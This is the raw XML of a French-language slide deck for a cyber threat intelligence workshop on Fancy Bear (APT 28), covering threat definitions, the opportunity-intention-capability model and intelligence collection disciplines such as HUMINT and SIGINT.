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39"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId40"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="1044" r:id="rId5"/>
    <p:sldId id="1045" r:id="rId6"/>
    <p:sldId id="1046" r:id="rId7"/>
    <p:sldId id="1049" r:id="rId8"/>
    <p:sldId id="1050" r:id="rId9"/>
    <p:sldId id="1051" r:id="rId10"/>
    <p:sldId id="1052" r:id="rId11"/>
    <p:sldId id="1053" r:id="rId12"/>
    <p:sldId id="1054" r:id="rId13"/>
    <p:sldId id="1056" r:id="rId14"/>
    <p:sldId id="1055" r:id="rId15"/>
    <p:sldId id="1057" r:id="rId16"/>
    <p:sldId id="915" r:id="rId17"/>
    <p:sldId id="1058" r:id="rId18"/>
    <p:sldId id="1059" r:id="rId19"/>
    <p:sldId id="1060" r:id="rId20"/>
    <p:sldId id="1061" r:id="rId21"/>
    <p:sldId id="1062" r:id="rId22"/>
    <p:sldId id="1063" r:id="rId23"/>
    <p:sldId id="1064" r:id="rId24"/>
    <p:sldId id="1065" r:id="rId25"/>
    <p:sldId id="1066" r:id="rId26"/>
    <p:sldId id="1072" r:id="rId27"/>
    <p:sldId id="1073" r:id="rId28"/>
    <p:sldId id="1067" r:id="rId29"/>
    <p:sldId id="1068" r:id="rId30"/>
    <p:sldId id="1069" r:id="rId31"/>
    <p:sldId id="1070" r:id="rId32"/>
    <p:sldId id="1071" r:id="rId33"/>
    <p:sldId id="1074" r:id="rId34"/>
    <p:sldId id="1075" r:id="rId35"/>
    <p:sldId id="1076" r:id="rId36"/>
    <p:sldId id="1077" r:id="rId37"/>
    <p:sldId id="1078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TI -P1" id="{13A18B1B-C52E-4B32-BF88-1B0F1C4F0456}">
          <p14:sldIdLst>
            <p14:sldId id="1044"/>
            <p14:sldId id="1045"/>
            <p14:sldId id="1046"/>
            <p14:sldId id="1049"/>
            <p14:sldId id="1050"/>
            <p14:sldId id="1051"/>
            <p14:sldId id="1052"/>
            <p14:sldId id="1053"/>
            <p14:sldId id="1054"/>
            <p14:sldId id="1056"/>
            <p14:sldId id="1055"/>
            <p14:sldId id="1057"/>
            <p14:sldId id="915"/>
            <p14:sldId id="1058"/>
            <p14:sldId id="1059"/>
            <p14:sldId id="1060"/>
            <p14:sldId id="1061"/>
            <p14:sldId id="1062"/>
            <p14:sldId id="1063"/>
            <p14:sldId id="1064"/>
            <p14:sldId id="1065"/>
            <p14:sldId id="1066"/>
            <p14:sldId id="1072"/>
            <p14:sldId id="1073"/>
            <p14:sldId id="1067"/>
            <p14:sldId id="1068"/>
            <p14:sldId id="1069"/>
            <p14:sldId id="1070"/>
            <p14:sldId id="1071"/>
            <p14:sldId id="1074"/>
            <p14:sldId id="1075"/>
            <p14:sldId id="1076"/>
            <p14:sldId id="1077"/>
            <p14:sldId id="10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AE9"/>
    <a:srgbClr val="1F608B"/>
    <a:srgbClr val="222A35"/>
    <a:srgbClr val="2C3E50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370" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="106" d="100"/>
          <a:sy n="106" d="100"/>
        </p:scale>
        <p:origin x="1818" y="150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02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3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500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475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164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978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535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542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03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13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006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179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470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381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367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353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943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841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874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33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118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6692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317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671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66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892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274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47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313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831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69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550CD5F9-5390-4CC7-B00C-E40A773BC8D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935AE9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5EC88556-944A-4D77-9A07-6E753FD1DDF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935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935AE9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7EDEABA-0B71-48C6-967F-0E7CCE658B1B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935AE9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E6F995DE-1D0E-4694-8185-4EA87450152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1D3D39E-DD68-4C7C-B895-F1D727EF3DF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935AE9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80716B74-F0FD-46CD-B39F-432DF57C39A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7B4326CC-5947-4C0A-B994-F9832AD249A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935AE9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19B04962-EF3B-4F1D-BE19-A6F787AB4BC7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run.mocky.io/v3/3b44f33d-b6e5-4ec6-b120-99b6ac52f74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3284984"/>
            <a:ext cx="5719514" cy="1944216"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cyber threat intelligence</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>workshop</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-part 1-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592288" cy="93568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The case of </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>fancy bear (apt 28)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 2" descr="Une image contenant logo, symbole, Police, Graphique&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3BE6EA0-C5C3-C97F-D26C-6217EB5D62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3057670" cy="18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Definir la menace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2524687"/>
            <a:ext cx="1514385" cy="35548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fr-FR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Processus de collecte, d'analyse, de distribution et d'échange d'informations sur les adversaires et les cyberattaques, utilisé pour renforcer la cybersécurité.</a:t>
            </a:r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4018094" y="4244263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26CFFF-7522-7D4C-F5CB-D9FBCEAB431F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065953" y="397893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D51B69-B021-DAA0-86FB-09330107D752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065953" y="1667232"/>
            <a:ext cx="719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Modèle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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Opportunité-Intention-Capacité (« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0" err="1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opportunity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE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FR" sz="1800" i="1" dirty="0" err="1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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE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FR" sz="1800" i="1" dirty="0" err="1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capability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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»)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9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C082CAF-F360-A67D-E03D-064B8A12DF99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3301908" y="2139348"/>
            <a:ext cx="2163678" cy="21398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INTENTION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A3900C9-7601-34A4-97DF-98AD37120357}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4033156" y="3133143"/>
            <a:ext cx="2163678" cy="231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6FF9B0E-1D39-2B6B-F2EE-50CDB097CB2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2518803" y="3156227"/>
            <a:ext cx="2240275" cy="2287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B9E9EA-B0D0-566D-BA03-4DF9E7A2FEBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3777999" y="2451580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1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTENTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (MOTIFS)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2FBEB0-60C4-5F36-DA1E-8388FD4DA7F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873236" y="417833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1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OCCASION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7AF8A-18B4-B85E-FEA5-F3496B79522B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2746176" y="4205789"/>
            <a:ext cx="1172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1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAPACITE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(MOYENS)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26BCD6-57D4-BF7F-DD7A-42FCEE8CF1EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6109681" y="4589749"/>
            <a:ext cx="3175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Circonstances, conditions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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 permet à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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adversaire d'agir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575449-D31C-4EE4-8C0B-CA64E0DE0D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5868144" y="2420888"/>
            <a:ext cx="31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fr-FR" sz="1800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objectifs, buts, motivations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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l'adversaire</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9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FAEE0A-A35C-A01D-2F2F-DFCBB8A47806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175604" y="2649070"/>
            <a:ext cx="2713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Moyens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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l’adversaire </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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atteindre ses objectifs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9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D971A5F-E727-4509-5BEB-30F2C3079003}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="1"/>
            <a:endCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5036677" y="2744054"/>
            <a:ext cx="831467" cy="30692"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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CE4A69B-3197-4D1B-987D-D1734C2E9E71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5473721" y="4547671"/>
            <a:ext cx="635960" cy="365244"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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CF1A7AD-062E-D5F2-4D5A-BBD1D1D10ECD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>
            <a:off x="1532450" y="3295401"/>
            <a:ext cx="1800137" cy="910388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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4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Definir la menace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2524687"/>
            <a:ext cx="1514385" cy="35548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fr-FR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Processus de collecte, d'analyse, de distribution et d'échange d'informations sur les adversaires et les cyberattaques, utilisé pour renforcer la cybersécurité.</a:t>
            </a:r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4033156" y="4249848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26CFFF-7522-7D4C-F5CB-D9FBCEAB431F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065953" y="397893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D51B69-B021-DAA0-86FB-09330107D752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1425752" y="1595273"/>
            <a:ext cx="605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Caractériser la menace – posséder des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>renseignements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sur ICO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C082CAF-F360-A67D-E03D-064B8A12DF99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3301908" y="2139348"/>
            <a:ext cx="2163678" cy="21398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INTENTION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A3900C9-7601-34A4-97DF-98AD37120357}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4033156" y="3133143"/>
            <a:ext cx="2163678" cy="231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6FF9B0E-1D39-2B6B-F2EE-50CDB097CB2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2518803" y="3156227"/>
            <a:ext cx="2240275" cy="2287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B9E9EA-B0D0-566D-BA03-4DF9E7A2FEBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786922" y="2454959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1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTENTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (MOTIFS)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2FBEB0-60C4-5F36-DA1E-8388FD4DA7F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859984" y="412609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1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OCCASION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7AF8A-18B4-B85E-FEA5-F3496B79522B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794197" y="4145925"/>
            <a:ext cx="1172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1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAPACITE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(MOYENS)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C0F8520-1A34-B69C-FCCD-2711EF36350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671493" y="3893748"/>
            <a:ext cx="2680780" cy="375560"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150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6A2AEA64-33F1-BA62-7F4B-4058F43A2287}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649547" y="4084642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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MENACE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5453EA8-53F8-9507-D325-2EBAE6EB60A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1779376" y="5545826"/>
            <a:ext cx="558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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Définir la menace = toujours par rapport à un adversaire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Définir le risque = toujours par rapport à la menace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0C728E3-7BE4-1FDB-2D19-F34846AFF967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588224" y="4625261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Menace potentielle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411A091-EBFD-6DBB-D4AF-7916E49633FA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4499992" y="4538803"/>
            <a:ext cx="2088232" cy="271124"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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FC7696CC-E92D-D0D4-AE4C-C1805A899A8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="2808129"/>
            <a:ext cx="207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Menace négligeable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FEE78C1-7F99-5CBC-A44F-725AB64EA29D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2610632" y="2992795"/>
            <a:ext cx="1097272" cy="436205"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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B0914033-0B28-5069-AA9B-BE2B47157E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5812059" y="2284848"/>
            <a:ext cx="201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Menace imminente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8FCC82F-34CC-1E12-ED46-A3F2FD38CDCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5036677" y="2469514"/>
            <a:ext cx="775382" cy="1038752"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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F076C9F-5269-16AD-54EE-D77A02BC8FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671493" y="5545826"/>
            <a:ext cx="5693130" cy="654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63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renseignements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2524687"/>
            <a:ext cx="1514385" cy="35548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fr-FR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Processus de collecte, d'analyse, de distribution et d'échange d'informations sur les adversaires et les cyberattaques, utilisé pour renforcer la cybersécurité.</a:t>
            </a:r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26CFFF-7522-7D4C-F5CB-D9FBCEAB431F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065953" y="397893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094FB8C-891C-F5B7-CD12-A7F68B2F9533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="1756471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Pour contrecarrer une menace – besoin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’informations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50BB60-F2EC-809F-8988-7BC1D7803B08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="2344990"/>
            <a:ext cx="85445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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquérir des connaissances sur les capacités, les intentions et les vulnérabilités de </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’adversaire, et le contexte général de la situation – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>définir le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>paysage des menaces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>landscape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ») et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>réduire l’incertitude et le risque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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les renseignements soutiennent la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prise de décision</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>la planification et l'exécution des missions offensives et défensives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comprendre la nature de la menace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359FA-F467-4B48-4C19-597F121033CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="3645023"/>
            <a:ext cx="6984776" cy="106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2F493C-EFA8-E734-B881-2B8A784992F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="4869160"/>
            <a:ext cx="80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Multiples disciplines de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>collecte d’informations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– fournir des multiples perspectives </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pour la même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4585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084676" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>La collecte d’informations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0385" y="764704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F055EC-C084-8DF0-13FE-3E7EB51F5118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896994" y="1717982"/>
            <a:ext cx="656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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HUMINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>renseignement humain (interaction humaine directe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>avec </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>sources)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9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F5DC11-7B00-02B2-C9C1-BB19688E4DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285206" y="2322320"/>
            <a:ext cx="6452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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SIGINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – renseignement des signaux (l'interception et l'analyse des </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signaux électroniques)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BB1FACB-A77E-7938-69E7-0D545F147E26}"/>
              </a:ext>
